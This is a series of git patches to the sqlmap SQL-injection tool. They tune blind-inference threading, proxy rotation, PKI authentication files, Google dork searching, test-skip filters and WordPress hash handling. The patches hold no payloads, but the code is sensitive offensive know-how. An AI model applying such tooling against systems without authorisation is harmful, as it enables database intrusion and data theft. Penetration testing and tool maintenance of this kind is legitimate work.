Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): From ea4cef9c6d3bde2e7479c5e96657fec2459809d7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 Sep 2015 13:44:51 +0200 
Subject: [PATCH 43/92] Skipping quit exception in case of --search --- plugins/dbms/mssqlserver/enumeration.py | 2 +- plugins/generic/databases.py | 6 ++++-- plugins/generic/entries.py | 4 +++- 3 files changed, 8 insertions(+), 4 deletions(-) diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 0aa86ae32..a653b964b 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -152,7 +152,7 @@ class Enumeration(GenericEnumeration): warnMsg += "for database '%s'" % db logger.warn(warnMsg) - if not kb.data.cachedTables: + if not kb.data.cachedTables and not conf.search: errMsg = "unable to retrieve the tables for any database" raise SqlmapNoneDataException(errMsg) else: diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index dba018808..b9eed29b9 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -358,7 +358,7 @@ class Databases: if bruteForce is None: logger.error(errMsg) return self.getTables(bruteForce=True) - else: + elif not conf.search: raise SqlmapNoneDataException(errMsg) else: for db, tables in kb.data.cachedTables.items(): @@ -432,10 +432,12 @@ class Databases: tblList = tblList[0] tblList = list(tblList) - else: + elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) + else: + return kb.data.cachedColumns tblList = filter(None, (safeSQLIdentificatorNaming(_, True) for _ in tblList)) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index dcfe3f4f5..8a9a05b18 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -89,10 +89,12 @@ class Entries: if isinstance(tblList[0], (set, tuple, list)): tblList = tblList[0] - else: + elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise 
SqlmapNoneDataException(errMsg) + else: + return for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) From d28c72b6f13c669ebe8c179335d52c2fc609fdbb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 Sep 2015 16:26:52 +0200 Subject: [PATCH 44/92] Another fix for Python 2.6 (bug introduced with ff7be9d0eb5baf89a5acc8a4c5325767e3582129) --- lib/utils/api.py | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index d8a38bf1e..07367b15c 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -376,15 +376,12 @@ def task_list(taskid=None): """ List task pull """ - if is_admin(taskid): - tasks = list(DataStore.tasks) - else: - tasks = [] - for key in DataStore.tasks: - if DataStore.tasks[key].remote_addr == request.remote_addr: - tasks.append(key) - tasks = {x: dejsonize(scan_status(x))['status'] - for x in list(DataStore.tasks)} + tasks = {} + + for key in DataStore.tasks: + if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: + tasks[key] = dejsonize(scan_status(key))["status"] + logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) From 4774795d8c60c6e70aad237acd2a330cf74ba9fd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 25 Sep 2015 14:59:21 +0200 Subject: [PATCH 45/92] Fixes #1429 --- lib/core/common.py | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/lib/core/common.py b/lib/core/common.py index 205f62864..147705db8 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1623,6 +1623,15 @@ def safeStringFormat(format_, params): index = retVal.find("%s", start) retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:] else: + if any('%s' in _ for _ in conf.parameters.values()): + parts = format_.split(' ') + for i in xrange(len(parts)): + if PAYLOAD_DELIMITER in 
parts[i]: + parts[i] = parts[i].replace(PAYLOAD_DELIMITER, "") + parts[i] = "%s%s" % (parts[i], PAYLOAD_DELIMITER) + break + format_ = ' '.join(parts) + count = 0 while True: match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal) From f16389232f8822d82d958b650a2c3e48a8ced985 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 25 Sep 2015 15:23:42 +0200 Subject: [PATCH 46/92] Bug fix for --proxy-file (only first element was fetched in case of fail) --- lib/core/option.py | 35 +++++++++++++++++++++++------------ lib/utils/google.py | 7 +++++-- 2 files changed, 28 insertions(+), 14 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 6eb4433a5..91f2996f9 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -27,6 +27,7 @@ import lib.core.common import lib.core.threads import lib.core.convert import lib.request.connect +import lib.utils.google from lib.controller.checks import checkConnection from lib.core.common import Backend @@ -91,6 +92,7 @@ from lib.core.exception import SqlmapInstallationException from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingPrivileges +from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapSystemException @@ -1084,18 +1086,22 @@ def _setHTTPProxy(): if hasattr(proxyHandler, "%s_open" % _): delattr(proxyHandler, "%s_open" % _) - if not conf.proxy: - if conf.proxyList: - conf.proxy = conf.proxyList[0] - conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1] + if conf.proxyList is not None: + if not conf.proxyList: + errMsg = "list of usable proxies is empty" + raise SqlmapNoneDataException(errMsg) - infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy - logger.info(infoMsg) - else: - if conf.hostname in 
('localhost', '127.0.0.1') or conf.ignoreProxy: - proxyHandler.proxies = {} + conf.proxy = conf.proxyList[0] + conf.proxyList = conf.proxyList[1:] - return + infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy + logger.info(infoMsg) + + elif not conf.proxy: + if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy: + proxyHandler.proxies = {} + + return debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests" logger.debug(debugMsg) @@ -1127,7 +1133,7 @@ def _setHTTPProxy(): if conf.proxyCred: _ = re.search("^(.*?):(.*?)$", conf.proxyCred) if not _: - errMsg = "Proxy authentication credentials " + errMsg = "proxy authentication credentials " errMsg += "value must be in format username:password" raise SqlmapSyntaxException(errMsg) else: @@ -1735,7 +1741,7 @@ def _setConfAttributes(): conf.parameters = {} conf.path = None conf.port = None - conf.proxyList = [] + conf.proxyList = None conf.resultsFilename = None conf.resultsFP = None conf.scheme = None @@ -2413,6 +2419,10 @@ def _basicOptionValidation(): errMsg = "switch '--tor' is incompatible with option '--proxy'" raise SqlmapSyntaxException(errMsg) + if conf.proxy and conf.proxyFile: + errMsg = "switch '--proxy' is incompatible with option '--proxy-file'" + raise SqlmapSyntaxException(errMsg) + if conf.checkTor and not any((conf.tor, conf.proxy)): errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)" raise SqlmapSyntaxException(errMsg) @@ -2480,6 +2490,7 @@ def _resolveCrossReferences(): lib.core.common.getPageTemplate = getPageTemplate lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage lib.request.connect.setHTTPProxy = _setHTTPProxy + lib.utils.google.setHTTPProxy = _setHTTPProxy lib.controller.checks.setVerbosity = setVerbosity def initOptions(inputOptions=AttribDict(), overrideOptions=False): diff --git a/lib/utils/google.py b/lib/utils/google.py index 8ee1ba99c..677fc4c72 100644 --- 
a/lib/utils/google.py +++ b/lib/utils/google.py @@ -48,7 +48,7 @@ class Google(object): self.opener.addheaders = conf.httpHeaders try: - conn = self.opener.open("http://www.google.com/ncr") + conn = self.opener.open("https://www.google.com/ncr") conn.info() # retrieve session cookie except Exception, ex: errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex) @@ -66,7 +66,7 @@ class Google(object): if not dork: return None - url = "http://www.google.com/search?" + url = "https://www.google.com/search?" url += "q=%s&" % urlencode(dork, convall=True) url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" url += "&start=%d" % ((gpage - 1) * 100) @@ -176,3 +176,6 @@ class Google(object): retVal = [urllib.unquote(match.group(1)) for match in re.finditer(regex, page, re.I | re.S)] return retVal + +def setHTTPProxy(): # Cross-linked function + raise NotImplementedError From b68891050d4042e9ccf54e5ceeaeee9041f71604 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 25 Sep 2015 23:41:47 +0200 Subject: [PATCH 47/92] Better word used --- lib/core/option.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/option.py b/lib/core/option.py index 91f2996f9..99c716032 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1088,7 +1088,7 @@ def _setHTTPProxy(): if conf.proxyList is not None: if not conf.proxyList: - errMsg = "list of usable proxies is empty" + errMsg = "list of usable proxies is exhausted" raise SqlmapNoneDataException(errMsg) conf.proxy = conf.proxyList[0] From 38541b021a06b88b8af761d2310e5976272db366 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 26 Sep 2015 00:09:17 +0200 Subject: [PATCH 48/92] Implementing hidden switch '--force-threads' on request (to force multi-threading in time-based SQLi) --- lib/parse/cmdline.py | 3 +++ lib/request/inject.py | 2 +- lib/techniques/blind/inference.py | 7 ++++--- 3 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/parse/cmdline.py 
b/lib/parse/cmdline.py index 6d417fc21..4eebceb2c 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -763,6 +763,9 @@ def cmdLineParser(argv=None): parser.add_option("--force-dns", dest="forceDns", action="store_true", help=SUPPRESS_HELP) + parser.add_option("--force-threads", dest="forceThreads", action="store_true", + help=SUPPRESS_HELP) + parser.add_option("--smoke-test", dest="smokeTest", action="store_true", help=SUPPRESS_HELP) diff --git a/lib/request/inject.py b/lib/request/inject.py index b12517ce4..13b8984d4 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -78,7 +78,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) if not (timeBasedCompare and kb.dnsTest): - if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not timeBasedCompare: + if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not conf.forceThreads): if field and re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): expression = "SELECT %s FROM (%s)" % (field, expression) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index e61b65154..3a6a0cdb7 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -146,12 +146,12 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if showEta: progress = ProgressBar(maxValue=length) - if timeBasedCompare and conf.threads > 1: + if timeBasedCompare and conf.threads > 1 and not conf.forceThreads: warnMsg = "multi-threading is considered unsafe in time-based data retrieval. 
Going to switch it off automatically" singleTimeWarnMessage(warnMsg) if numThreads > 1: - if not timeBasedCompare: + if not timeBasedCompare or conf.forceThreads: debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) logger.debug(debugMsg) else: @@ -597,8 +597,9 @@ def queryOutputLength(expression, payload): infoMsg = "retrieving the length of query output" logger.info(infoMsg) - lengthExprUnescaped = agent.forgeQueryOutputLength(expression) start = time.time() + + lengthExprUnescaped = agent.forgeQueryOutputLength(expression) count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS) debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) From 5ed106eceaef995b0b080ce50a09b0b48eb27856 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 27 Sep 2015 15:59:17 +0200 Subject: [PATCH 49/92] Patch for an Issue #1434 --- lib/core/dicts.py | 1 + lib/core/option.py | 10 +++++----- lib/core/optiondict.py | 2 +- lib/parse/cmdline.py | 4 ++-- lib/request/pkihandler.py | 7 ++++--- sqlmap.conf | 4 ++-- 6 files changed, 15 insertions(+), 13 deletions(-) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index b6a0ea2ba..47e316e87 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -223,6 +223,7 @@ DEPRECATED_OPTIONS = { "--replicate": "use '--dump-format=SQLITE' instead", "--no-unescape": "use '--no-escape' instead", "--binary": "use '--binary-fields' instead", + "--auth-private": "use '--auth-file' instead", "--check-payload": None, "--check-waf": None, } diff --git a/lib/core/option.py b/lib/core/option.py index 99c716032..d73b512bc 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1264,13 +1264,13 @@ def _setHTTPAuthentication(): global authHandler - if not conf.authType and not conf.authCred and not conf.authPrivate: + if not conf.authType and not conf.authCred and not conf.authFile: return - if conf.authPrivate and not conf.authType: + if conf.authFile and not 
conf.authType: conf.authType = AUTH_TYPE.PKI - elif conf.authType and not conf.authCred and not conf.authPrivate: + elif conf.authType and not conf.authCred and not conf.authFile: errMsg = "you specified the HTTP authentication type, but " errMsg += "did not provide the credentials" raise SqlmapSyntaxException(errMsg) @@ -1285,7 +1285,7 @@ def _setHTTPAuthentication(): errMsg += "Basic, Digest, NTLM or PKI" raise SqlmapSyntaxException(errMsg) - if not conf.authPrivate: + if not conf.authFile: debugMsg = "setting the HTTP authentication type and credentials" logger.debug(debugMsg) @@ -1336,7 +1336,7 @@ def _setHTTPAuthentication(): debugMsg = "setting the HTTP(s) authentication PEM private key" logger.debug(debugMsg) - _ = safeExpandUser(conf.authPrivate) + _ = safeExpandUser(conf.authFile) checkFile(_) authHandler = HTTPSPKIAuthHandler(_) diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 3ff1ded01..257f86eb0 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -37,7 +37,7 @@ optDict = { "headers": "string", "authType": "string", "authCred": "string", - "authPrivate": "string", + "authFile": "string", "proxy": "string", "proxyCred": "string", "proxyFile": "string", diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 4eebceb2c..b801bab95 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -144,8 +144,8 @@ def cmdLineParser(argv=None): help="HTTP authentication credentials " "(name:password)") - request.add_option("--auth-private", dest="authPrivate", - help="HTTP authentication PEM private key file") + request.add_option("--auth-file", dest="authFile", + help="HTTP authentication PEM cert/private key file") request.add_option("--ignore-401", dest="ignore401", action="store_true", help="Ignore HTTP Error 401 (Unauthorized)") diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py index ea3aa7aad..2f0c31dba 100644 --- a/lib/request/pkihandler.py +++ b/lib/request/pkihandler.py @@ -11,12 +11,13 @@ import 
urllib2 from lib.core.data import conf class HTTPSPKIAuthHandler(urllib2.HTTPSHandler): - def __init__(self, key_file): + def __init__(self, auth_file): urllib2.HTTPSHandler.__init__(self) - self.key_file = key_file + self.auth_file = auth_file def https_open(self, req): return self.do_open(self.getConnection, req) def getConnection(self, host, timeout=None): - return httplib.HTTPSConnection(host, key_file=self.key_file, timeout=conf.timeout) + # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain + return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) diff --git a/sqlmap.conf b/sqlmap.conf index c18159375..2bcd15f1d 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -93,10 +93,10 @@ authType = # Syntax: username:password authCred = -# HTTP Authentication PEM private key. Useful only if the target URL requires +# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires # PKI authentication and you have such data. # Syntax: key_file -authPrivate = +authFile = # Use a proxy to connect to the target URL. 
# Syntax: (http|https|socks4|socks5)://address:port From 5bade7947b25251d7eb03b7a51a8ae66f1c67e3f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 27 Sep 2015 16:09:02 +0200 Subject: [PATCH 50/92] Fixes #1435 --- lib/utils/google.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/utils/google.py b/lib/utils/google.py index 677fc4c72..0fec576e6 100644 --- a/lib/utils/google.py +++ b/lib/utils/google.py @@ -31,6 +31,8 @@ from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE from lib.core.settings import UNICODE_ENCODING from lib.request.basic import decodePage from lib.request.httpshandler import HTTPSHandler +from thirdparty.socks import socks + class Google(object): """ @@ -100,7 +102,7 @@ class Google(object): warnMsg += "to get error page information (%d)" % e.code logger.critical(warnMsg) return None - except (urllib2.URLError, httplib.error, socket.error, socket.timeout): + except (urllib2.URLError, httplib.error, socket.error, socket.timeout, socks.ProxyError): errMsg = "unable to connect to Google" raise SqlmapConnectionException(errMsg) From ef22f31fdf9174bc33c6bf99c8ebe2ab8f960618 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 27 Sep 2015 16:17:58 +0200 Subject: [PATCH 51/92] Fixes #1433 --- lib/request/connect.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index a49bba0a3..537a1cb64 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -144,6 +144,7 @@ class Connect(object): warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " warnMsg += "lower the value of option '--time-sec' (e.g. 
'--time-sec=2')" singleTimeWarnMessage(warnMsg) + elif kb.originalPage is None: if conf.tor: warnMsg = "please make sure that you have " @@ -160,13 +161,12 @@ class Connect(object): warnMsg += "with the switch '--random-agent' turned on " warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" singleTimeWarnMessage(warnMsg) + elif conf.threads > 1: warnMsg = "if the problem persists please try to lower " warnMsg += "the number of used threads (option '--threads')" singleTimeWarnMessage(warnMsg) - time.sleep(1) - kwargs['retrying'] = True return Connect._getPageProxy(**kwargs) From 1fd6b007ab0d3fd347c4d1f4642565ff892dcd2a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 27 Sep 2015 16:36:20 +0200 Subject: [PATCH 52/92] Less critical messages when something goes wrong with connection --- lib/request/connect.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index 537a1cb64..b0d645264 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -621,7 +621,11 @@ class Connect(object): return None, None, None elif threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". 
sqlmap is going to retry the request" - logger.critical(warnMsg) + if not retrying: + warnMsg += "(s)" + logger.critical(warnMsg) + else: + logger.debug(warnMsg) return Connect._retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) From ac467bc4538627f49eeb38e05513688fc7d143b2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 28 Sep 2015 09:54:41 +0200 Subject: [PATCH 53/92] Fixes #1437 --- lib/techniques/blind/inference.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 3a6a0cdb7..11e78ed6c 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -232,8 +232,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None # Used for gradual expanding into unicode charspace shiftTable = [2, 2, 3, 3, 5, 4] - if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl: - charTbl.remove(ord('\n')) + if "'%s'" % CHAR_INFERENCE_MARK in payload: + for char in ('\n', '\r'): + if ord(char) in charTbl: + charTbl.remove(ord(char)) if not charTbl: return None From 906cb6d3c2388e21c76b03a74de9cab88b75f4b4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 28 Sep 2015 11:11:39 +0200 Subject: [PATCH 54/92] Removing a hard limit to use --start/--stop only for --dump scenarios --- lib/core/common.py | 11 +++++------ plugins/generic/entries.py | 2 +- 2 files changed, 6 insertions(+), 7 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 147705db8..c52441c70 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1370,7 +1370,7 @@ def expandAsteriskForColumns(expression): return expression -def getLimitRange(count, dump=False, plusOne=False): +def getLimitRange(count, plusOne=False): """ Returns range of values used in limit/offset constructs @@ -1382,12 +1382,11 @@ def getLimitRange(count, dump=False, plusOne=False): count = int(count) limitStart, limitStop = 1, count - if dump: 
- if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop: - limitStop = conf.limitStop + if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop: + limitStop = conf.limitStop - if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop: - limitStart = conf.limitStart + if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop: + limitStart = conf.limitStart retVal = xrange(limitStart, limitStop + 1) if plusOne else xrange(limitStart - 1, limitStop) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 8a9a05b18..6dc5fe8c4 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -275,7 +275,7 @@ class Entries: else: emptyColumns = [] plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, dump=True, plusOne=plusOne) + indexRange = getLimitRange(count, plusOne=plusOne) if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: for column in colList: From 5ce4d4d2ec1877a77ca7defe2249e8c95d64d032 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 29 Sep 2015 10:10:39 +0200 Subject: [PATCH 55/92] Fixes #1439 --- lib/utils/hash.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index e0a0a0c50..c4a3739c9 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -327,8 +327,10 @@ def wordpress_passwd(password, salt, count, prefix, uppercase=False): return output + password = password.encode(UNICODE_ENCODING) + cipher = md5(salt) - cipher.update(password.encode(UNICODE_ENCODING)) + cipher.update(password) hash_ = cipher.digest() for i in xrange(count): From a1a7161fabe49cc884e67af70e2e32d7ed3f0509 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 30 Sep 2015 10:13:19 +0200 Subject: [PATCH 56/92] Fixes #1441 --- lib/request/comparison.py | 11 +++++++++-- 1 file changed, 9 
insertions(+), 2 deletions(-) diff --git a/lib/request/comparison.py b/lib/request/comparison.py index b3d76ea27..7028b364f 100644 --- a/lib/request/comparison.py +++ b/lib/request/comparison.py @@ -128,9 +128,16 @@ def _comparison(page, headers, code, getRatioValue, pageLength): count += 1 else: break + if count: - seq1 = seq1[count:] - seq2 = seq2[count:] + try: + _seq1 = seq1[count:] + _seq2 = seq2[count:] + except MemoryError: + pass + else: + seq1 = _seq1 + seq2 = _seq2 while True: try: From 29edb4f75cab29d9d81f2ddff9546cd7f531627a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 30 Sep 2015 11:26:56 +0200 Subject: [PATCH 57/92] Fixes #1440 --- lib/core/common.py | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/lib/core/common.py b/lib/core/common.py index c52441c70..6ff973a58 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2809,7 +2809,13 @@ def unArrayizeValue(value): """ if isListLike(value): - value = value[0] if len(value) > 0 else None + if not value: + value = None + elif len(value) == 1 and not isListLike(value[0]): + value = value[0] + else: + _ = filter(lambda _: _ is not None, (_ for _ in flattenValue(value))) + value = _[0] if len(_) > 0 else None return value From 53de0e8949ca10a7b4649503bf1ffe4fd92ec916 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 1 Oct 2015 11:57:33 +0200 Subject: [PATCH 58/92] Implements #1442 --- lib/controller/checks.py | 10 ++++++++++ lib/core/option.py | 4 ++++ lib/core/optiondict.py | 1 + lib/parse/cmdline.py | 3 +++ sqlmap.conf | 3 +++ 5 files changed, 21 insertions(+) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index eac95629e..e03b8909d 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -207,6 +207,16 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue + # Skip tests if title, vector or DBMS is included by the + # given skip filter + if conf.testSkip and any(conf.testSkip in str(item) or 
\ + re.search(conf.testSkip, str(item), re.I) for item in \ + (test.title, test.vector, payloadDbms)): + debugMsg = "skipping test '%s' because its " % title + debugMsg += "name/vector/DBMS is included by the given skip filter" + logger.debug(debugMsg) + continue + if payloadDbms is not None: # Skip DBMS-specific test if it does not match the user's # provided DBMS diff --git a/lib/core/option.py b/lib/core/option.py index d73b512bc..f51e5210c 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1634,6 +1634,10 @@ def _cleanupOptions(): conf.testFilter = conf.testFilter.strip('*+') conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter) + if conf.testSkip: + conf.testSkip = conf.testSkip.strip('*+') + conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip) + if "timeSec" not in kb.explicitSettings: if conf.tor: conf.timeSec = 2 * conf.timeSec diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 257f86eb0..9eb0d121a 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -205,6 +205,7 @@ optDict = { "saveConfig": "string", "scope": "string", "testFilter": "string", + "testSkip": "string", "updateAll": "boolean", }, diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index b801bab95..03bb1ac80 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -674,6 +674,9 @@ def cmdLineParser(argv=None): general.add_option("--test-filter", dest="testFilter", help="Select tests by payloads and/or titles (e.g. ROW)") + general.add_option("--test-skip", dest="testSkip", + help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") + general.add_option("--update", dest="updateAll", action="store_true", help="Update sqlmap") diff --git a/sqlmap.conf b/sqlmap.conf index 2bcd15f1d..fb0e00185 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -708,6 +708,9 @@ scope = # Select tests by payloads and/or titles (e.g. ROW) testFilter = +# Skip tests by payloads and/or titles (e.g. 
BENCHMARK) +testSkip = + # Update sqlmap. # Valid: True or False updateAll = False From acd6b7797f44ac6339508b46522a5545a62c7b4d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 15:18:54 +0200 Subject: [PATCH 59/92] Fixes #1446 --- lib/core/common.py | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 6ff973a58..6bbe947e4 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1875,8 +1875,13 @@ def readCachedFileContent(filename, mode='rb'): with kb.locks.cache: if filename not in kb.cache.content: checkFile(filename) - with openFile(filename, mode) as f: - kb.cache.content[filename] = f.read() + try: + with openFile(filename, mode) as f: + kb.cache.content[filename] = f.read() + except (IOError, OSError, MemoryError), ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (filename, ex) + raise SqlmapSystemException(errMsg) return kb.cache.content[filename] From 1c6e288eb1e169e174cf7346a3e9e0f92e7e4e49 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 15:33:29 +0200 Subject: [PATCH 60/92] Fixes #1447 --- lib/core/common.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/lib/core/common.py b/lib/core/common.py index 6bbe947e4..3740365de 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2503,7 +2503,10 @@ def extractTextTagContent(page): page = page or "" if REFLECTED_VALUE_MARKER in page: - page = re.sub(r"(?si)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) + try: + page = re.sub(r"(?i)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) + except MemoryError: + page = page.replace(REFLECTED_VALUE_MARKER, "") return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page))) From 20c19f33dc9e77b327657451d6d459b0ad575a4b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Oct 2015 15:51:21 +0200 Subject: [PATCH 61/92] Minor 
